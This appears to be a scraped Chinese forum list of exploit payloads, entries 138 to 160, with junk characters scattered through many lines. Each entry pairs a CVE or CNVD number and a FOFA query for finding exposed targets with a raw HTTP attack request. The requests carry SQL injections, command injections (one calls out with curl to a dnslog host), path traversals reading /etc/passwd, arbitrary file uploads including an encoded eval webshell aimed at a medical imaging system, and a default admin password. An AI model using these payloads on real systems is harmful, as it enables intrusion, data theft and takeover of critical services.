" Z- D( Y8 ?8 L. {8 g138. 福建科立讯通信指挥调度平台pwd_update.php sql注入. X2 ?( A. V9 E  N" p
CVE-2024-2621% ^( ^' i. p0 r5 b4 b! A* j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"2 @, j1 l4 {% V/ ?' D
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
  H/ K* `$ F$ Y# k2 ]Host: x.x.x.x
6 P- a0 s( G2 T1 j. k4 y0 |6 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
  m  |) B5 {+ _/ K% M& `) YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: q4 ^& Y  b7 j" Q) H7 A, GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 c* K% M9 s" D6 I* I% y+ t  a( ^: WAccept-Encoding: gzip, deflate, br
; s2 a  |! d+ `4 V  oConnection: close; Q% G+ D3 u& z! K$ X
Upgrade-Insecure-Requests: 1! D; Y. N# Y" H$ p6 w  `
- G5 K5 z/ V/ E7 v

& I; X6 g9 N2 |/ g1 ^139. 福建科立讯通信指挥调度平台editemedia.php sql注入  N/ R" B, V' M* A$ E" T
CVE-2024-2622
* j" C9 [/ q1 q) E! h7 AFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
# f( J5 T  u1 T8 gGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1; |% R- _5 X. z& z
Host: x.x.x.x2 q2 G9 P/ k. T  s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 L8 {9 o8 C! ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 |% i: K2 I" ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 |: s) u, n. x) w7 a! O7 O% NAccept-Encoding: gzip, deflate, br
% d& T) ~! R6 v$ w' d  {" K- @6 C* IConnection: close
% `( f$ b* S' U4 q5 P3 K. |Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk1 J: C  `. o# I0 R' \
Upgrade-Insecure-Requests: 16 P. G2 H) X, D; R+ h$ _6 e+ x

' t/ ^; ~5 F9 {5 A1 s9 y
( d9 P% O" r  O3 v140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
# o( g( t* z$ F3 \1 _* hCVE-2024-2566
/ O  c# ?) f; j+ B$ x8 IFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
8 o- l) l9 l5 t" M& ]* \$ j) w2 nGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1: O2 b8 O1 l. u! }
Host: x.x.x.x0 o  P# @& z) ^) r' o" m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
- x( I! W5 l' z/ ?; D; UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  m9 x# c6 h  F/ C0 q0 e  R$ P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 Y5 m* E* R: A1 ~; A" e' yAccept-Encoding: gzip, deflate, br
4 S. ?/ p: w0 E# i, mConnection: close
+ V$ X9 Y  G' k% E) C- rCookie: authcode=h8g9
. q( U* e& f% i3 R) lUpgrade-Insecure-Requests: 1: e7 @  S& v. G( k) i

, z+ H& n! A" T! A* c  j; y) j+ o: K$ [
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入: c% P0 ~+ d( u$ c# ?
FOFA:body="指挥调度管理平台"
2 l3 ?; O- s  oPOST /app/ext/ajax_users.php HTTP/1.1
+ |4 D, R# [) j6 \/ I4 j. fHost: your-ip0 B; U2 y$ \6 y' I& m% {
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info! s. O4 E1 K' ^  N# A% m
Content-Type: application/x-www-form-urlencoded$ A6 n- ~" }# V5 k; S+ [
" m; w+ h: T" b, N1 r

: }' w! r& j+ [' T7 J5 E0 Wdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
3 h" Q" ~( h7 {+ H
( q4 R- T8 e7 e; d. Z5 N
4 s1 }4 R3 M5 O2 t5 P8 i2 J( l7 T' T142. CMSV6车辆监控平台系统中存在弱密码
4 H9 l9 [8 t3 A% ?1 J2 B  _: MCVE-2024-29666, X% L5 C0 \% b7 n; B
FOFA:body="/808gps/"
! U& O8 J: n0 B9 _admin/admin
" b, V- I! `% I, }) j6 C, B* q143. Netis WF2780 v2.1.40144 远程命令执行
# ~" k# w1 N8 g: |! P- _  aCVE-2024-25850, i+ b' @" Z" x
FOFA:title='AP setup' && header='netis'
4 k& f( [( b2 m+ A/ R7 i$ rPAYLOAD6 D: F& t2 Z3 X+ h, h

7 g+ Q& z3 b1 e) G) [" o3 A5 K144. D-Link nas_sharing.cgi 命令注入
+ t+ k7 w+ r( z6 w8 LFOFA:app="D_Link-DNS-ShareCenter"! W( A' n! O0 k' `* [8 Q  S" v
system参数用于传要执行的命令- R) G& H" _! R) H" W
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1* Z3 ~# X4 g. q, @1 \  \/ b9 d3 U
Host: x.x.x.x
1 R8 n* u# \; x  EUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0! B4 T& O+ G3 d( c& J
Connection: close9 N% Z% H: M5 H2 v# E
Accept: */*/ q7 k: N9 \$ F) K
Accept-Language: en# v) C$ A0 D# C) U9 H
Accept-Encoding: gzip
4 ]0 A' o  A( L* V1 \  Q
; `) u3 z) M1 J9 m( ?  m! W) a+ f. r! z3 I
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入* z. Z" W3 L' j" N1 @
CVE-2024-3400* [4 _0 E; p7 V7 ^  ]6 T
FOFA:icon_hash="-631559155"
& b2 ?. b! Q: t- O: v  {$ iGET /global-protect/login.esp HTTP/1.1
4 V; o/ Z7 ?" gHost: 192.168.30.112:1005
! q! n7 H$ a$ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84: F% S. P7 |2 R6 C* s
Connection: close: W+ p# \2 @9 h" v% _  `
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;1 I- N6 c. W/ c$ K3 X1 R
Accept-Encoding: gzip: }& `1 \& R8 `+ ~$ C# _. }1 n$ K
5 L" j) k, q5 S7 ]& w- _( F( s% e
! H. q5 i5 K, O1 @# S$ D
146. MajorDoMo thumb.php 未授权远程代码执行) {+ o8 @& y  ~4 D- ~0 r- ~
CNVD-2024-02175
; R) [, m+ T, e- jFOFA:app="MajordomoSL"
; _$ s2 P0 Y7 LGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
* U# A# l6 Q! C+ }$ E2 DHost: x.x.x.x
* c% `/ J$ d/ j- o  ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84  @8 y! K! n9 U! r7 Y
Accept-Charset: utf-82 W) J" O$ `8 [! J: ?& N
Accept-Encoding: gzip, deflate
* I9 l- z4 C$ pConnection: close# e# n* d6 L0 W7 }
: a' A$ W, |. Y5 q
+ U) g2 C/ S; }% b9 Y/ d+ B
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
3 g! C! U" h: J1 bCVE-2024-32399& b' {9 q7 h* }% n2 P  U. l$ q
FOFA:body="RaidenMAILD": l2 y: \9 Q7 L+ S! ^! g3 k) g: g. [
GET /webeditor/../../../windows/win.ini HTTP/1.1" ?# M3 j, f* ]- q! X8 H
Host: 127.0.0.1:81
9 T9 O" g  g5 c6 k( O( tCache-Control: max-age=0
& @% A! N! E+ W% GConnection: close; H3 X9 F3 u" }# ^

7 |0 |/ @7 n9 P) r, g
) e- Q6 D. N0 H5 a# P5 U3 L) M/ t148. CrushFTP 认证绕过模板注入% G! C, e7 O3 b* J3 t7 H3 a
CVE-2024-4040
# Z3 t) Z9 q$ X8 N" DFOFA:body="CrushFTP"
1 G6 l1 n* U- d" [PAYLOAD
) P1 ]( N  S/ J1 e' L4 ^
' J0 [( J/ d/ v. u1 v' I" N; \149. AJ-Report开源数据大屏存在远程命令执行! v8 U6 F5 I6 c. a% y
FOFA:title="AJ-Report"5 q/ T% v6 ^; ]( F% d5 X4 ?3 u

4 J, K* I: f# E2 N" g0 jPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
$ t# `' h$ p! G! PHost: x.x.x.x" q9 M- ~& f: N: _7 h9 k% J' ?) n5 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
  \  a& }" D; s( Q) hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 X& L0 Z+ G; R0 {& rAccept-Encoding: gzip, deflate, br" x7 R* }# L" P3 U! S! u
Accept-Language: zh-CN,zh;q=0.9$ T% h( ^! m7 p9 e, p
Content-Type: application/json;charset=UTF-8
3 k9 b1 k2 |. R% W9 v  Z' SConnection: close9 s* k  B: N" P- w

. z& b' S+ L2 U* X{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}" h4 {3 K* x8 k; D: g
3 `6 H% t" S3 K# h$ A8 e
150. AJ-Report 1.4.0 认证绕过与远程代码执行
% p# \5 t9 g4 P6 F1 f+ V3 \FOFA:title="AJ-Report"
; _8 M7 ~( U+ w4 m* Y$ O7 ]POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
9 O: n& @8 C; b. t. QHost: x.x.x.x1 V7 {1 B$ u: J! J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: d- V* i; I$ @9 M+ S7 E: X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% Y9 q% K. _' ?2 |/ A  _Accept-Encoding: gzip, deflate, br2 I, j2 `& `0 F2 M% R" z1 t) L9 l
Accept-Language: zh-CN,zh;q=0.9
. M- W9 }4 B$ F* G( d% S2 \/ bContent-Type: application/json;charset=UTF-8
# n/ S+ j  d* [$ xConnection: close6 u- C' Q( b  h. m( z, U" Y
Content-Length: 339
0 l8 S$ D. n; d* r4 X1 E
) V- `, C7 F, h2 Z& w{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
4 Z% g( j# t  y" u7 @* k( J7 X" d5 O, q/ v4 U2 P
5 [$ j0 W$ h/ G0 r/ b* r  w1 I- H5 d6 P
151. AJ-Report 1.4.1 pageList sql注入
9 u& R7 i6 z+ t# RFOFA:title="AJ-Report"; J- n: R! O7 g" N
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.11 R6 u' T! Z6 P  y5 ^
Host: x.x.x.x
" p* t( r& Y6 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" G# \$ M& l! z1 B6 Z1 Q
Connection: close
1 Y" T5 N) A- ~  t! XAccept-Encoding: gzip! D0 v8 s! f* j/ [
1 I  |% l  _4 T* k

" ?4 L! P: ]  U1 b152. Progress Kemp LoadMaster 远程命令执行) R* Z7 N% n" a& M* U
CVE-2024-1212
) X9 k" v6 b# g8 T, A/ v6 GLoadMaster <= 7.2.59.2 (GA). V5 z0 N: e2 I7 v7 q# ^
LoadMaster<=7.2.54.8 (LTSF)9 w/ D. f. P$ U% ]$ C% T1 B
LoadMaster <= 7.2.48.10 (LTS)6 `$ M. \, W; ]0 J  }
FOFA:body="LoadMaster"
& U; z& O; f- T$ yJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码& R- l# H2 d7 T/ m; v! v" W
GET /access/set?param=enableapi&value=1 HTTP/1.11 `7 V0 i% l6 [7 c4 w- Y1 z5 U
Host: x.x.x.x
! Y+ o  D9 I4 T) F9 D# |. HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1$ y+ H( f& ~1 y+ N
Connection: close1 g1 Z/ s4 I6 l: X4 G
Accept: */*
( S# O6 J/ ~( x! kAccept-Language: en7 S$ C* U, Q) a1 S+ ^, z) C$ B
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=' Y0 i7 f1 U9 m8 r& v, g8 K( q
Accept-Encoding: gzip* w9 g; d; r9 P: j$ z/ o/ q  d

8 H: G& f. J) |/ T. f1 A: s5 g; P7 D# D  v' Y5 p/ Q
153. gradio任意文件读取
5 _% F7 I9 v/ TCVE-2024-1561FOFA:body="__gradio_mode__"  \# q, q, G9 b% X" n" }
第一步,请求/config文件获取componets的id- E: s: \6 \$ p, G
http://x.x.x.x/config
9 ]' l. c' m# \+ Z
6 Z* r: f1 \& c$ B% F: C( _3 Y- j  f) E+ @- l
第二步,将/etc/passwd的内容写入到一个临时文件
. `0 n0 B! |( K6 m4 u. y4 zPOST /component_server HTTP/1.1
+ K. S  X$ {+ o% wHost: x.x.x.x
8 g1 i1 ~2 a0 u+ ?4 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
3 ?% o+ Q  S0 M8 V. l' N3 mConnection: close& X7 n9 O6 v( _' F) C3 u& z  I
Content-Length: 115
1 O4 {4 a; o# ?" r; FContent-Type: application/json
8 I" y: P' C( Q3 _# UAccept-Encoding: gzip' r8 N7 G9 z' Y

5 V2 t9 r& R" S, x" V* ~{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
" [( V* t& a5 G; C: |- N  L; z7 j/ ^. s6 J5 c2 ^3 g

% L* d5 W+ V" c+ N; w9 d第三步访问
: e# W: B' H" [http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd6 v+ z) {; G3 r( M" m+ N* j

5 d% _7 f- E+ _1 O* d6 L( v9 M3 Z9 q5 }8 z
154. 天维尔消防救援作战调度平台 SQL注入9 E9 k5 K' }% R/ v
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
* K. E: e6 c4 m( k, Z8 E" XPOST /twms-service-mfs/mfsNotice/page HTTP/1.1$ i( T5 O' Z# H2 U( W
Host: x.x.x.x
: s0 w# C% r1 @' \; lContent-Length: 106
! V, A6 O8 q& Q" O. R) fCache-Control: max-age=0. H# J# @/ }2 m  m1 C
Upgrade-Insecure-Requests: 1& L/ h3 c* ], H
Origin: http://x.x.x.x
! C6 X2 |: ]. p, J5 l0 o6 N8 eContent-Type: application/json
; L! A& [9 h  x4 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
5 Q6 u, L  M  s8 t! D1 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* E  b8 R$ `5 i5 lReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page: a4 N& @1 ?7 ?. o: Y* V0 @
Accept-Encoding: gzip, deflate
4 r' I. m6 O+ @" kAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
" _3 X, x* R2 u/ vConnection: close: K  L4 l/ G, O  h( V; K, S
* ?4 A0 k1 p% M2 y+ z
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}" i& u  s3 Z  q! ~1 l1 t

7 w, j4 ?' o9 t4 p. q7 F' N, A1 @( m3 p* c1 l, N# ^# W
155. 六零导航页 file.php 任意文件上传5 N% l' [5 w& h* j9 }( |- r' a
CVE-2024-34982; w4 c" }" I( d; m  k1 ]
FOFA:title=="上网导航 - LyLme Spage"' N5 ~6 j, H; o# }6 P" L
POST /include/file.php HTTP/1.1, \( Z0 `) Z. P) {
Host: x.x.x.x& I9 o* O2 o% Y: f$ k, X) M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 u8 h3 I7 W$ A$ kConnection: close
. O- D0 D8 A* J0 q9 W, s4 O- ^: MContent-Length: 232% ]% i; r/ N  |& q9 [6 `) \
Accept: application/json, text/javascript, */*; q=0.01- c" m* g8 S7 k0 Z- J0 N+ F. ]( x
Accept-Encoding: gzip, deflate, br
& c# p& I0 c( Z6 o. ]) eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ a( L- x, c1 w* g4 w& dContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f! p* r9 ?& t$ r& Z2 i- w
X-Requested-With: XMLHttpRequest" E4 u) J3 H7 O0 m" C) q
- y3 \) @9 C7 s
-----------------------------qttl7vemrsold314zg0f9 S  j: Y9 _; o' O3 ]5 G
Content-Disposition: form-data; name="file"; filename="test.php"$ \9 \2 \; Y+ E" R
Content-Type: image/png7 F" m0 c# {1 Y

' L( y- h. w1 G/ \+ y! V  }1 z<?php phpinfo();unlink(__FILE__);?>
  q9 ~) n! a3 l# L-----------------------------qttl7vemrsold314zg0f--# x& O& |: C: I" P" _9 b1 y+ `: B7 X, ~
' J0 o" ^  ]% k+ Z) P  R$ X
( n$ A0 k( H. K
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php/ `% K! [! o; _. f* k0 Z
% [- b6 x9 Q" m. u& c  t: o
156. TBK DVR-4104/DVR-4216 操作系统命令注入
8 X8 `9 N7 \9 B8 o4 eCVE-2024-3721
- b% |& F9 D% F+ X' t( @' l+ n8 v* eFOFA:"Location: /login.rsp"
% f* u! K+ ]/ T# o·TBK DVR-4104
1 F/ O' ]0 e  k·TBK DVR-4216: O  w5 e3 z+ o5 R' n" {
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
+ q" D2 \% Y3 t8 ^8 D# U
, y3 y0 ~% v, Q: J) g+ D2 u% u# |6 b9 h5 ?8 @$ e
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.12 s9 r1 T0 d: ]  I
Host: x.x.x.x5 F  p0 |! |$ h. X- b9 U
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 @, X4 c  x+ l2 u* [6 s" I
Connection: close- d4 C. O3 H6 d( f0 Z
Content-Length: 0$ X. S7 O  w0 C* I+ w$ e5 u
Cookie: uid=1
% g! p* r1 X+ @: g1 pAccept-Encoding: gzip" R4 E7 q2 ]  p: c5 N! s
4 t7 i( w7 V% N& K3 |& y! T. J
& X) l" O; r( A' `& f1 o% Z
157. 美特CRM upload.jsp 任意文件上传
& K7 A. n  I/ r7 L1 @CNVD-2023-06971
1 R( R, O  L8 t/ l' |9 ]( M  IFOFA:body="/common/scripts/basic.js"
5 a7 _* r( _& C( i9 E9 APOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1- s4 |/ g$ E8 x6 f8 J
Host: x.x.x.x. Y; i" p; ?# \4 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
3 ]+ E, h3 R8 x" Y7 b0 X, z: GContent-Length: 709/ Y# f, I0 P1 l) O# c6 `1 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 e+ ^* ]- R# B3 y* TAccept-Encoding: gzip, deflate
4 a) m, a' L" v: r# U& U3 UAccept-Language: zh-CN,zh;q=0.9
5 ~& K3 E6 {, _+ M' d/ |& TCache-Control: max-age=09 d( R! r* _8 j- [5 d; I! x9 l) H$ Q
Connection: close$ @4 t! `1 z( ?- g5 m0 N& H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN/ L3 [2 N7 U5 L5 P- O
Upgrade-Insecure-Requests: 18 {5 J3 @8 ^5 f% M' G# Z* G- Q
, ?  ^, N: H4 S  Q2 E
------WebKitFormBoundary1imovELzPsfzp5dN
( ~: U! m' k; j4 QContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
& v. T( K3 K, `Content-Type: application/octet-stream
! p8 \7 K/ O( ^7 j1 A7 b, {7 E) A' `+ _6 @1 j( s% ]. b4 I7 b
nyhelxrutzwhrsvsrafb* |, ^2 Y: @+ Z  ]
------WebKitFormBoundary1imovELzPsfzp5dN1 a- X$ ^+ C; G# I# ^  G
Content-Disposition: form-data; name="key"9 E$ a/ Z- o  c( ?8 n: N: e* h
9 |  I9 J' }4 o" j
null
+ L& L0 h$ d  t7 Y------WebKitFormBoundary1imovELzPsfzp5dN
+ g6 d1 {  ^6 F# ]Content-Disposition: form-data; name="form"
& D7 L, l+ I: H3 w1 c
5 x6 s6 N+ R: X- q% |1 Dnull
7 q6 H7 O1 E( e6 B------WebKitFormBoundary1imovELzPsfzp5dN" q4 e$ A. Q! P0 s
Content-Disposition: form-data; name="field"" e# Z% a( ?6 ~2 v$ @4 g
+ E( i% X; a! _3 ~; F' l
null
# J$ u* Z/ G. O. G9 w* T; h------WebKitFormBoundary1imovELzPsfzp5dN5 j! b  Q! h& n" r9 X7 L! q. W
Content-Disposition: form-data; name="filetitile"5 O! G5 G2 m, c, Y
" U9 h9 v" Z1 ]# U5 K5 h
null; }! V% X* u) Q3 q  }
------WebKitFormBoundary1imovELzPsfzp5dN8 A6 X' J7 w0 [+ h/ z- S
Content-Disposition: form-data; name="filefolder"7 N3 R9 E7 f7 t8 N* X7 _9 b

+ x( h0 p9 o6 H% [5 Y) {' Onull% T9 g1 j7 w% {
------WebKitFormBoundary1imovELzPsfzp5dN--
6 v' a+ j2 H0 W9 n9 p$ {2 G/ E* q, Z/ Q7 Q
- P0 O( n3 w3 w
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp: K6 H3 z5 f( H3 ~0 E" x8 D. A" e
; w$ l* ^1 z" Q( n. c
158. Mura-CMS-processAsyncObject存在SQL注入
1 E" F. W5 h/ ^; s# `! UCVE-2024-32640
4 I1 ?& }6 `7 ]5 G' i6 h. zFOFA:"Generator: Masa CMS", a- k3 }4 E% h# ?0 z
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
7 L& Y% N: u& ~% _1 j, _4 U6 OHost: {{Hostname}}
9 j8 w* N* \' F9 ~2 k9 gContent-Type: application/x-www-form-urlencoded
" l% D$ l* Z# _, ?1 x9 F. z6 N/ g6 a* {
object=displayregion&contenthistid=x\'&previewid=1
1 J. U9 E1 ^1 l+ T  S
7 F1 C+ K! o+ r3 C
; X/ y# s, A1 w$ f' R159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
; }3 E. f5 G4 c, R6 tFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
* s# r% s& b' }5 L& h7 x7 mPOST /webservices/WebJobUpload.asmx HTTP/1.1
( \" r! m* |& _  {Host: x.x.x.x, f2 Z. m0 g; a2 e; u; q/ T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36+ I8 l( K, |* U( f, Y1 Y
Content-Length: 1080( D$ R$ f# U" H2 ]; B5 i) ?( g
Accept-Encoding: gzip, deflate
; ?8 _1 x- U4 a& b2 W  t1 vConnection: close- h- H% F! @1 n. V7 U% T5 }) c4 U" l
Content-Type: text/xml; charset=utf-8
; @* ]" K% L. {/ YSoapaction: "http://rainier/jobUpload"
0 M' V0 O$ r8 h6 I8 f9 x8 L
. }7 u- }8 T% J4 u0 D1 n<?xml version="1.0" encoding="utf-8"?>
" |. S1 d% l: y) w<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">% c( X$ a: u  ~8 L( t4 L. K; |
<soap:Body>
6 ~7 p( \1 f) h8 x/ x<jobUpload xmlns="http://rainier">5 W& p$ t1 R( b! v0 m
<vcode>1</vcode>- K4 ]2 O' o$ ?- f8 I
<subFolder></subFolder>7 a2 L$ w. D8 X. j
<fileName>abcrce.asmx</fileName>0 x) Y' L- t: }; e9 V+ u
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
/ H! l& o. L5 Z' f+ T  p, {</jobUpload>1 U  o# H( R3 `, J& v, L0 y5 d
</soap:Body>) \8 a" P1 a9 ?5 }
</soap:Envelope># ~8 u7 ~+ Y9 w3 F) g& b

5 g" W3 d0 W0 g6 Z1 C7 I
. O" z. ^% z, r0 o# l. Z" M/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")' I  _4 R3 V# L" ^# m5 ~

; E* m. @/ D' n# F# T4 P2 P6 I' G1 L! {0 M* \: C1 }! U% E. w
160. Sonatype Nexus Repository 3目录遍历与文件读取
6 {+ c; l) m2 w, R: \+ ]. X$ DCVE-2024-4956% ]$ P! S+ I2 e: j4 u1 R8 t
FOFA:title="Nexus Repository Manager"9 K1 W" }% k# I. O- F
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
2 T( i% x5 q5 iHost: x.x.x.x+ L& p: J7 }4 _; w0 a. |
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0% c3 p9 c% E8 t- |- D: Q2 a
Connection: close
" ]( }6 k0 L/ i  k7 aAccept: */*, |! y- P8 {; i9 d
Accept-Language: en
# w" h! k/ _% O! NAccept-Encoding: gzip8 G( X& E  h+ I& ?5 [+ A4 f* k+ ]  y
